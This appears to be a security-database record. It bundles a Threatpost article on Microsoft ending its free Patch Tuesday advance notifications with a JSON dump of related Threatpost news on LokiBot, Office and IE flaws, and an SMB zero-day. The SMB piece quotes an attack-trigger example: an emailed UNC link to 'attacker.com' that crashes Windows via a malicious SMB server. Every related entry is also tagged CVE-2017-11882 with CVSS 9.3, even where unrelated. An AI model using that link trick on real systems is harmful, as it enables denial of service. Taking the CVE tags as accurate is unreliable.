Microsoft Shuts Down Patch Tuesday Advanced Notifications
2015-01-08T14:50:57
ID THREATPOST:3283173A16F1E86892491D89F2E307C2 Type threatpost Reporter Michael Mimoso Modified 2015-01-12T20:44:11
Description
Microsoft today pulled the plug on its Advanced Notification Service (ANS), offering it going forward only to paying Premier customers.
ANS preceded the release of Microsoft’s monthly Patch Tuesday security bulletins; on the Thursday prior, Microsoft would provide users via its security website a high-level preview of how many bulletins could be expected on the ensuing Tuesday and, more importantly, the severity of the vulnerabilities scheduled to be patched. The advance notification helped companies allocate resources ahead of time for patch prioritization and testing.
Microsoft, however, said today that the decade-old ANS has outlived its usefulness.
“ANS has always been optimized for large organizations. However, customer feedback indicates that many of our large customers no longer use ANS in the same way they did in the past due to optimized testing and deployment methodologies,” said Chris Betz of the Microsoft Security Resource Center. “While some customers still rely on ANS, the vast majority waits for Update Tuesday, or take no action, allowing updates to occur automatically.”
Betz said Microsoft customers instead rely on Microsoft Update and Windows Server Update Service to assist with patch prioritization.
“Customers are also moving to cloud-based systems which provide continuous updating,” Betz said.
That rationalization isn’t sitting well with some experts, who said the move goes against the grain established by the Trustworthy Computing initiative, which not only revamped how Microsoft builds security into its development lifecycle, but also gave birth to Patch Tuesday.
“This is an assault on IT and IT security teams everywhere. Making this change without any lead-up time is simply oblivious to the impact this will have in the real world,” said Ross Barrett, senior manager of security engineering at Rapid7. “Microsoft is basically going back to a message of ‘just blindly trust’ that we will patch everything for you. Honestly, it’s shocking.”
Microsoft said it will provide ANS to its Premier customers through their Technical Account Manager support representatives; participants in Microsoft’s MAPP partner program will also receive ANS notifications. In May, Microsoft made available its new myBulletins service, which allows Windows admins to customize security patch information, filtering it by products in use inside an enterprise or midmarket company. Notifications and advisories were left out of myBulletins, to the chagrin of some.
“With the advent of the famous TWC memo and years of work by MSRC to gain a solid working relationship within the security community, to suddenly switch a free and relied-upon service to a fee-based system will only backfire,” said Andrew Storms, vice president of security services at New Context, a systems architecture firm in San Francisco. “I can only imagine that since the forced retirement of so many MSRC folks in 2014, that Microsoft might be trying to make ends meet.”
Microsoft in September announced it was disbanding its Trustworthy Computing unit, the cornerstone of the Secure Development Lifecycle born out of Bill Gates’ 2002 memo. The decision coincided with the layoff of 2,100 employees and reshuffling of many TWC security people into the company’s cloud and enterprise division, as well as Microsoft’s legal group.
Microsoft was not clear on whether all of its advanced notifications will go away, including those for out-of-band patches.
“If that’s the case, then it will surely feel like Microsoft has stepped back in time by a decade or more,” Storms said.
{"threatpost": [{"lastseen": "2018-10-06T22:55:55", "description": "Anxiety was high around April 8, 2014 when Microsoft officially closed the door on [security support for Windows XP](<https://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252/>). Many envisioned black hats worldwide stockpiling exploits waiting for the day when XP machines would be left permanently exposed.\n\nThe anticipated malware apocalypse, however, never really came for the remaining XP machines in circulation.\n\nAnd now here we are again with another important [Microsoft-imposed deadline](<https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support>) at hand, and again anxiety is bubbling\u2014but perhaps with good reason this time.\n\nNext Tuesday will bring the first batch of Microsoft security bulletins for 2016 and it will also herald the end of security support for Internet Explorer versions 8, 9 and 10 on some Microsoft platforms. Microsoft made the call almost 18 months ago, giving businesses ample time to prepare for the day when those versions of IE, [battered by zero-days](<https://threatpost.com/microsoft-to-fix-word-zero-day-with-final-xp-patch/105241/>), exploit kits and targeted attacks, should be retired.\n\nReality, however, usually bites.\n\nEnterprises and midmarket companies reliant on homegrown web applications that were built for IE 8, 9 or 10 aren\u2019t in any hurry for a costly retool of those programs to work seamlessly on IE 11 or the new Edge browser. Statistics from a number of sources bear out the fact that there remains a significant percentage of web traffic moving through IE. [Netmarketshare.com](<https://www.netmarketshare.com/browser-market-share.aspx?qprid=2&qpcustomd=0>), for example, says that while IE 11 holds more than 25 percent of market share, IE 8, 9 and 10 combined still account for more than 20 percent. 
Researchers at Duo Security, examining traffic moving through their services, [put the percentage a bit higher](<https://www.duosecurity.com/blog/microsoft-drops-support-for-internet-explorer-just-how-big-of-deal-is-this>) for IE 9 and 10\u2014almost 36 percent\u2014running on Windows 7, 8, or 8.1.\n\nGiven that browsers historically offer hackers a much juicier attack surface than operating systems, folks may want to take Tuesday\u2019s deadline seriously.\n\n\u201cIn most cases an attacker will need to already have access to a local network or be able to trick users into opening malicious files as part of a successful attack leveraging Windows XP vulnerabilities,\u201d said Tripwire security researcher Craig Young. \u201cThe web browser on the other hand is of course used to constantly process data from potentially untrusted sources leaving users exposed to a wide range of attack.\u201d\n\nMicrosoft, for its part, continues to roll out patches for IE at a near-record pace. Patch Tuesday, the second Tuesday of every month, brings with it routine cumulative updates for the browser, sometimes addressing two- or three-dozen CVEs, most of which enable remote code execution and bypass some existing security mitigation.\n\n\u201cAttackers have known since the summer of 2014 that Microsoft was dropping support for IE; it\u2019s reasonable to assume that attackers know people are staying on these platforms and will take advantage of the circumstances,\u201d said Michael Hanley, program manager of research and development at Duo Security. \u201cWe still expect an aggressive effort against IE 8, 9 and 10 going into 2016.\u201d\n\nMicrosoft [isn\u2019t completely abandoning IE 8, 9 and 10](<https://support.microsoft.com/en-us/lifecycle#gp/Microsoft-Internet-Explorer>), however. 
IE 9 will still be supported on Vista SP 2 desktops, while IE 9 will continue to receive support on Windows Server 2008 SP2 and IA64, and IE 10 will be supported on Windows Server 2012.\n\nTripwire\u2019s Young said that while attackers may not be hoarding IE 8, 9 and 10 exploits right now, they are going to be paying attention to what\u2019s patched in IE 11 going forward.\n\n\u201cIt is also quite safe to assume that even without attackers stockpiling IE vulnerability information ahead of the support cut-off that attackers will easily learn new attack techniques by analyzing future IE 11 updates,\u201d Young said. \u201cSome rough estimates using Tripwire VERT\u2019s vulnerability database indicate that more than two-thirds of the vulnerabilities addressed in IE 11 also required patching in previous versions.\u201d\n\nAnd then there\u2019s application compatibility. Enterprises, experts said, should weigh the cost of updating applications to work with the newest browsers against the cost of a breach of a legacy system via IE.\n\n\u201cThe cost of a breach is so high, companies need to move toward apps that support latest security technology, browsers and OSes,\u201d Hanley said.\n\nYoung notes that this is one instance where consumers, because of Windows Update automation, may already be on IE 11 and ahead of business implementations in terms of security.\n\n\u201cWith some applications it can be non-trivial to port code to the newer browsers with many organizations trying to defer the associated costs for as long as possible,\u201d Young said. \u201cWhile there may not be an immediate security risk from using industry-specific web applications with the unsupported browser, problems arise during the lunch hour when employees start exploring the web. 
Businesses with application requirements for older web browsers would be well advised to block browsing from these systems.\u201d\n", "cvss3": {}, "published": "2016-01-08T13:41:04", "type": "threatpost", "title": "End of Life Internet Explorer 8, 9, 10 Security Support", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-01-13T14:09:22", "id": "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "href": "https://threatpost.com/older-ie-versions-losing-security-support-on-tuesday/115828/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-09T22:13:17", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that the LokiBot info-stealing trojan is seeing a surge across the enterprise landscape.\n\nThe uptick started in July, according to the agency, and activity has remained \u201cpersistent\u201d ever since.\n\nLokiBot targets Windows and [Android endpoints](<https://threatpost.com/lokibot-redux-common-android-apps/157458/>), and spreads mainly through email (but also via malicious websites, texts and messaging). It typically goes after credentials (usernames, passwords, cryptocurrency wallets and more), as well as personal information. The malware steals the data through the use of a keylogger to monitor browser and desktop activity, CISA explained.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cLokiBot has stolen credentials from multiple applications and data sources, including Windows operating system credentials, email clients, File Transfer Protocol and Secure File Transfer Protocol clients,\u201d according to the alert, [issued Tuesday](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>). 
\u201cLokiBot has [also] demonstrated the ability to steal credentials from\u2026Safari and Chromium and Mozilla Firefox-based web browsers.\u201d\n\nTo boot, LokiBot can also act as a backdoor into infected systems to pave the way for additional payloads.\n\nLike its Viking namesake, LokiBot is a bit of a trickster, and disguises itself in diverse attachment types, sometimes using steganography for maximum obfuscation. For instance, the malware has been disguised as a .ZIP attachment [hidden inside a .PNG file](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) that can slip past some email security gateways, or [hidden as an ISO disk image](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>) file attachment.\n\nIt also uses a number of application guises. \u201cSince LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications,\u201d CISA noted. For instance, in February, it was seen [impersonating a launcher](<https://www.trendmicro.com/en_us/research/20/b/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file.html>) for the popular Fortnite video game.\n\nOther tactics include the use of zipped files along with malicious macros in Microsoft Word and Excel, and leveraging the exploit [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) (an issue in Office Equation Editor that allows attackers to automatically run malicious code without requiring user interaction). 
The latter is done via malicious RTF files, researchers have observed.\n\nTo boot, researchers [have seen the malware being sold](<https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/>) as a commodity in underground markets, with versions selling for as little as $300.\n\nWith all of these factors taken together, LokiBot represents \u201can attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases,\u201d according to CISA.\n\nSaryu Nayyar, CEO at Gurucul, noted that the advisory is another indication of how malware authors have turned their malicious activities into a scalable business model.\n\n\u201cThe fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,\u201d she said, via email.\n\nTo protect themselves, CISA said that companies should keep patches up to date, disable file- and printer-sharing services if not necessary, enforce multi-factor authentication and strong passwords, enable personal firewalls and scanning of downloads, and implement user education on how to exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known.\n", "cvss3": {}, "published": "2020-09-23T15:27:18", "type": "threatpost", "title": "CISA: LokiBot Stealer Storms Into a Resurgence", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-09-23T15:27:18", "id": "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "href": "https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:09:10", "description": "Microsoft today denied that it has built a \nbackdoor into Windows 7, a concern that surfaced yesterday after a \nsenior National 
Security Agency (NSA) official testified before Congress that the agency had worked on the operating system. \u201cMicrosoft has not and will not put \u2018backdoors\u2019 into Windows,\u201d a company spokeswoman said. [Read the full article](<http://www.computerworld.com/s/article/9141182/Microsoft_denies_it_built_backdoor_in_Windows_7>). [Computerworld]\n", "cvss3": {}, "published": "2009-11-19T21:17:20", "type": "threatpost", "title": "MS Denies Windows 7 Backdoor Allegations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:06:04", "id": "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "href": "https://threatpost.com/ms-denies-windows-7-backdoor-allegations-111909/73142/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "Microsoft will use its monthly patch to fix a critical security hole in versions of its Microsoft Office suite that could allow attackers to run malicious code on vulnerable systems. \n\nThe company [announced details of its upcoming monthly patch for November on Thursday](<http://www.microsoft.com/technet/security/bulletin/ms10-nov.mspx>). This month\u2019s patch also included bulletins regarding upcoming fixes for two other security vulnerabilities: another in the Microsoft Office suite that was rated \u201cimportant,\u201d and a third in the Forefront Unified Access Gateway that was also rated \u201cimportant.\u201d \n\nThe relatively meager group of three bulletins is a welcome change for IT administrators still trying to dig out from [October\u2019s monthly patch](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>), which comprised 16 bulletins and fixes for 49 separate vulnerabilities. \n\nThe most serious vulnerability is rated \u201ccritical\u201d for Microsoft Office 2007, Service Pack 2 and for 32- and 64-bit editions of Office 2010. 
It is rated \u201cimportant\u201d for Office 2003, Service Pack 3, Office XP, Service Pack 3 and Office for Mac 2011. \n\nAccording to Microsoft\u2019s Bulletin [Severity Rating System](<http://www.microsoft.com/technet/security/bulletin/rating.mspx>), \u201ccritical\u201d vulnerabilities are described as those whose exploitation could allow the propagation of an Internet worm without user interaction, while \u201cimportant\u201d holes are those in which exploitation could result in the compromise of the confidentiality, integrity or availability of users\u2019 data or processing resources. \n\nA second Office vulnerability is rated \u201cimportant\u201d and affects PowerPoint 2002 Service Pack 3 and PowerPoint 2003 Service Pack 3. \n\nThe third bulletin affects Microsoft\u2019s Forefront Unified Access Gateway 2010 Updates 1 and 2 and is rated important. \n\nMicrosoft will release its monthly patch update on Tuesday, November 9, 2010. \n", "cvss3": {}, "published": "2010-11-04T21:58:02", "type": "threatpost", "title": "Microsoft To Patch Critical Office Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:44", "id": "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "href": "https://threatpost.com/microsoft-patch-critical-office-flaw-110410/74642/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:09", "description": "Targeted attacks have been spotted against a zero-day vulnerability in Microsoft Word 2010, leading Microsoft to issue a special [security advisory](<http://blogs.technet.com/b/msrc/archive/2014/03/24/microsoft-releases-security-advisory-2953095.aspx>) and produce a [Fix-it solution](<https://support.microsoft.com/kb/2953095>) for users until a patch is ready.\n\nMicrosoft also said that its Enhanced Mitigation Experience Toolkit (EMET) is a temporary mitigation for the zero-day. 
Some versions of EMET would have to be configured to work with Microsoft Office in order to ward off exploits; EMET 4.1 is already configured for Office, for example.\n\nWhile attacks are currently targeting Microsoft Word 2010, Microsoft said the vulnerability affects Word 2003, 2007, 2013 and 2013RT, as well as Office for Mac, Office Web Apps 2010 and 2013, and Word Viewer.\n\nAn attacker could exploit the vulnerability with a malicious Rich Text Format file or email in Outlook configured to use Microsoft Word as the email viewer, said Dustin Childs, a Trustworthy Computing group manager at Microsoft.\n\nThe vulnerability can also be exploited over the Web where an attacker could host a website containing a malicious RTF exploit, or upload a malicious RTF exploit onto a site that accepts user-provided content. Victims would have to be enticed into opening the content; an exploit cannot be triggered without user interaction.\n\nThe Fix it disables opening of RTF content in Word, Microsoft said.\n\n\u201cThe issue is caused when Microsoft Word parses specially crafted RTF-formatted data causing system memory to become corrupted in such a way that an attacker could execute arbitrary code,\u201d Microsoft said in its advisory, adding that Word is by default the email reader in Outlook 2007, 2010 and 2013.\n\nMicrosoft said it could release an out-of-band patch, but more likely it will wait until its next Patch Tuesday security updates are released on April 8. That date also signals the end of support for Windows XP, Microsoft announced some time ago.\n\nMicrosoft has made it a common practice to release Fix it mitigations or recommend the use of EMET as a temporary stopgap while zero-day vulnerabilities are being actively exploited in the wild. 
The last one issued was in February for a string of attacks against a [zero day in Internet Explorer](<http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCcQFjAA&url=http%3A%2F%2Fthreatpost.com%2Fmicrosoft-ships-fix-it-for-ie-10-zero-day%2F104383&ei=pH8wU-bhGcyGkQeZ7YDoBA&usg=AFQjCNGZPcpQBjYGur3Gsyg2qMm5Pwg--Q&bvm=bv.62922401,d.eW0&cad=rja>).\n\nThe vulnerability in IE 10 was exploited by [two different hacker groups](<http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344>) against government and aerospace targets in the U.S. and France respectively. The same use-after-free vulnerability was present in IE 9 but was not being exploited.\n\nEMET has also been a popular mitigation recommendation from Microsoft against memory-based vulnerabilities. The toolkit contains a dozen mitigations that fend off buffer overflow attacks and others that allow attackers to execute code on vulnerable machines.\n\nMost recently, Microsoft released a [technical preview of EMET 5.0](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) that included two new exploit mitigations. 
Researchers, however, have been finding moderate success in developing [bypasses for some of the protections bundled in with EMET](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>).\n", "cvss3": {}, "published": "2014-03-24T15:20:55", "type": "threatpost", "title": "Microsoft Advisory Warns of Word Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-27T17:51:05", "id": "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "href": "https://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:38", "description": "****[](<https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/>)Dennis Fisher talks with Stephen Toulouse, director of policy and enforcement for Xbox Live at Microsoft, about his years at the Microsoft Security Response Center, the evolution of security at Microsoft and the joy and pain of being the bad guy on Xbox Live.\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_301.mp3>)\n\nSubscribe to the Digital Underground podcast on [****](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-09-10T19:45:50", "type": "threatpost", "title": "Stephen Toulouse on the MSRC, the Evolution of Security at Microsoft and Securing Xbox Live", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "href": "https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/73017/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:54", "description": "Microsoft has released the emergency out-of-band patch for the [ASP.NET padding oracle attack](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>), less than two weeks after a pair of researchers discussed the flaw and a reliable attack against it at a security conference in Argentina. \n\nThe patch for the ASP.NET bug is only available through [Microsoft\u2019s Download Center](<https://www.microsoft.com/downloads/en/default.aspx?pf=true>) right now, but the company plans to push it out over Windows Update and Windows Server Update within a few days, as well. \n\n\u201cFor customers who use Automatic Updates, the update will be automatically applied once it is released broadly. Once the Security Update is applied, customers are protected against known attacks related to Security Advisory 2416728,\u201d said Dave Forstrom, director of Trustworthy Computing at Microsoft. \n\nThe company will hold a [live webcast](<https://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?EventID=1032464130&EventCategory=4&culture=en-US&CountryCode=US>) at 4 p.m. EDT Tuesday to discuss the vulnerability and the patch release. \n\nThe ASP.NET vulnerability first came to light on Sept. 13 when the researchers who discovered the vulnerability, Juliano Rizzo and Thai Duong, [discussed the bug and their technique for exploiting it](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>). The attack itself is an implementation of an existing technique developed several years ago to exploit weaknesses in crypto implementations.\n\n\u201cWe knew ASP.NET was vulnerable to our attack several months ago, but we didn\u2019t know how serious it is until a couple of weeks ago. 
It turns out that the vulnerability in ASP.NET is the most critical amongst other frameworks. In short, it totally destroys ASP.NET security,\u201d said Duong, when discussing the attack. \u201cIt\u2019s worth noting that the attack is 100% reliable, i.e. one can be sure that once they run the attack, they can exploit the target. It\u2019s just a matter of time. If the attacker is lucky, then he can own any ASP.NET website in seconds. The average time for the attack to complete is 30 minutes. The longest time it ever takes is less than 50 minutes.\u201d\n\nLast week Microsoft released some guidance for customers, explaining a couple of workarounds for the vulnerability that could help mitigate attacks. However, Rizzo and Duong said that the workarounds, which rely on changing the way that error messages are generated by target Web applications, don\u2019t protect against the attack, just one version of it.\n\nMicrosoft didn\u2019t release any information on the vulnerability until Sept. 17, the day that Rizzo and Duong gave their presentation at Ekoparty. This is the second time in less than two months that Microsoft has released an emergency patch. On Aug. 2, the company issued an [out-of-band patch](<https://threatpost.com/attacks-escalate-microsoft-ships-emergency-windows-patch-080210/>) for the original bug that was identified as part of the Stuxnet malware attack. 
\n", "cvss3": {}, "published": "2010-09-28T18:12:43", "type": "threatpost", "title": "Microsoft Pushes Emergency Patch For ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:24:17", "id": "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "href": "https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/74525/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:17", "description": "Microsoft will release on Tuesday guidelines for developers building online applications and for those using the Agile code-development process. The Agile guidelines apply principles from Microsoft\u2019s Security Development Lifecycle (SDL) to Agile, an umbrella term for a development model frequently used for Web-based applications released under short deadlines, called \u201csprints.\u201d [Read the full article](<http://www.computerworld.com/s/article/9140543/Microsoft_to_release_security_guidelines_for_Agile>). 
[Computerworld]\n", "cvss3": {}, "published": "2009-11-09T18:26:11", "type": "threatpost", "title": "Microsoft to Give Security Guidelines for Agile", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:14:29", "id": "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "href": "https://threatpost.com/microsoft-give-security-guidelines-agile-110909/73057/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:13", "description": "In part two of his lecture on exploiting Microsoft Windows, Dino Dai Zovi discusses specific techniques for attacking Windows machines.\n", "cvss3": {}, "published": "2009-11-16T16:24:46", "type": "threatpost", "title": "Windows Exploitation Part 2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:24:32", "id": "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "href": "https://threatpost.com/windows-exploitation-part-2-111609/73105/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "Dennis Fisher talks to Adam Shostack of Microsoft, about the evolution of thinking around \u201cThe New School of Information Security,\u201d his new group blog and what surprised him most when he went to work at Microsoft.\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_410.mp3>)\n\nSubscribe to the Digital Underground podcast on [****](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [Curious Hands](<http://podsafeaudio.com/jamroom/bands/1309/>).\n", "cvss3": {}, "published": "2009-04-07T13:43:08", "type": "threatpost", "title": "Adam Shostack on the Science of Security and Value of Thinking Differently", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:25:28", "id": 
"THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "href": "https://threatpost.com/adam-shostack-science-security-and-value-thinking-differently-040709/72705/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:08", "description": "Microsoft will not rush out an emergency patch for a zero-day vulnerability disclosed on Wednesday in the Windows implementation of the Server Message Block protocol.\n\nResearcher Laurent Gaffie announced in a tweet, below, that he\u2019d found a zero-day vulnerability in SMBv3 and released a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/SMBv3%20Tree%20Connect>). He told Threatpost that he privately disclosed the issue to Microsoft on Sept. 25 and that Microsoft told him it had a patch ready for its December patch release, but decided to wait until its scheduled February update to release several SMB patches rather than a single fix in December. Microsoft considers the vulnerability, a remotely triggered denial-of-service bug, low-risk.\n\n> SMBv3 0day, Windows 2012, 2016 affected, have fun \ud83d\ude42 Oh&if you understand this poc, bitching SDLC is appropriate \ud83d\ude42<https://t.co/xAsDOY54yl>\n> \n> \u2014 Responder (@PythonResponder) [February 1, 2017](<https://twitter.com/PythonResponder/status/826926681701113861>)\n\n\u201cWindows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. Our standard policy is that on issues of low risk, we remediate that risk via our current Update Tuesday schedule,\u201d a Microsoft spokesperson told Threatpost in an email statement. The next scheduled Microsoft update is Feb. 14.\n\nGaffie said the vulnerability is specifically a null pointer dereference in SMB and that it affects Windows Server 2012 and 2016. 
He added that a joint analysis between himself and Microsoft concluded that code execution doesn\u2019t seem possible through an exploit of this vulnerability. SMB is generally not exposed to the Internet, though Gaffie said that outbound connections where clients connect to remote file servers are more likely to be allowed than inbound SMB connections over an open port 445.\n\n\u201cThis bug can be used to trigger a reboot on a given target, it can be either local (via netbios, llmnr poisoning) or remote via a UNC link (example: adding an image with a link: \\\\\\[attacker.com](<http://attacker.com/>)\\file.jpg in an email),\u201d Gaffie said. \u201cIt\u2019s important to note that this trivial bug should have been caught immediately by their SDLC process, but surprisingly it was not. This means that the new code base was simply not audited or fuzzed before shipping it on their latest operating systems.\u201d\n\nGaffie also said he decided to release details prior to the availability of a patch because it\u2019s not his first experience working with Microsoft where they have delayed a patch release for one of his bugs.\n\n\u201cI decided to release this bug one week before the patch is released, because it is not the first time Microsoft sits on my bugs,\u201d he said. \u201cI\u2019m doing free work here with them (I\u2019m not paid in any way for that) with the goal of helping their users. When they sit on a bug like this one, they\u2019re not helping their users but doing marketing damage control, and opportunistic patch release. 
This attitude is wrong for their users, and for the security community at large.\u201d\n\nJohannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center, said he ran Gaffie\u2019s exploit and could confirm that it caused a crash on a fully patched Windows 10 system.\n\n\u201cModern Windows versions have several protection mechanisms to prevent remote execution for exploits like this,\u201d Ullrich said. \u201cIt would likely be difficult, but not necessarily impossible.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/02/06230816/Screen-Shot-2017-02-02-at-1_29_33-PM.png>)\n\nUllrich published a post on the SANS ISC site describing [his testing of Gaffie\u2019s exploit](<https://isc.sans.edu/diary/Windows%2BSMBv3%2BDenial%2Bof%2BService%2BProof%2Bof%2BConcept%2B%280%2BDay%2BExploit%29/22029>). The PoC would require an attacker to send a link to a victim, luring them to connect to a malicious SMB server instance.\n\n\u201cA URL like \\\\\\\\[server ip address\\IPC$ would trigger the exploit,\u201d Ullrich said. \u201cI have tested it in Edge and Internet Explorer on Windows 10 with a local html file like that and it shut down the system immediately.\n\n\u201cThe exploit implements its own SMB server, so it is as easy as running the exploit, making sure the user can connect (e.g. firewall issues) and then sending the \u2018right\u2019 link to the user,\u201d Ullrich said. \u201cThis is pretty easy to exploit. Took me maybe 10 minutes to get it to work. 
The exploit comes without instructions.”

Ullrich explained that the attacker will respond with a crafted Tree Connect Response—Tree Connect Requests are sent to Windows Servers when users connect to shares—that is lengthy and also includes a “long trailer.” He explained in the SANS ISC post that the tree connect response message consists of a NetBIOS header and message type of a total length of 1580 bytes, and an SMB2 header that is 64 bytes long. The Tree Connect Response message has a fixed length of 8 bytes in addition to the fixed header.

“This is where the message should end. But apparently, since the total message size according to the NetBIOS header is larger, Windows keeps on decoding in the crafted header (all ‘C’s’ in the exploit), which then triggers the buffer overflow,” Ullrich said.

Microsoft Waits for Patch Tuesday to Fix SMB Zero Day
2017-02-03T08:36:13
ID THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B Type threatpost Modified 2017-02-03T19:56:30
https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/
CVE-2017-11882 CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE)

Last seen 2018-10-06T22:56:31
Description
**UPDATE**–As if all of the vulnerabilities in Flash and Windows discovered in the Hacking Team document cache and the 193 bugs Oracle fixed last week weren’t enough for organizations to deal with, HP’s Zero Day Initiative has released four new zero days in Internet Explorer Mobile that can lead to remote code execution on Windows Phones.

The four vulnerabilities originally were reported to Microsoft as affecting IE on the desktop, and later on it was discovered that they also affected IE Mobile on Windows Phones.
Microsoft has patched all of the vulnerabilities in the desktop version of the browser, but the bugs remain open on IE Mobile. ZDI’s original advisories on these flaws said that they were zero days on Internet Explorer, as well. The company updated the advisories late Thursday to reflect the fact that the bugs only affect IE Mobile.

“We’re aware of the reports regarding Internet Explorer for Windows Phone. A number of factors would need to come into play, and no attacks have been reported. We continue to monitor the situation and will take appropriate steps to protect our customers,” a Microsoft spokesperson said.

Each of the four vulnerabilities is in a different component of the browser, but they all are remotely exploitable. The advisories from ZDI say that attackers could exploit these vulnerabilities through typical drive-by attacks.

The most severe of the four vulnerabilities is a bug in the way that Internet Explorer handles some specific arrays.

“The vulnerability relates to how Internet Explorer processes arrays representing cells in HTML tables. By manipulating a document’s elements an attacker can force Internet Explorer to use memory past the end of an array of HTML cells. An attacker can leverage this vulnerability to execute code under the context of the current process,” the [advisory from ZDI](<http://www.zerodayinitiative.com/advisories/ZDI-15-359/>) says.

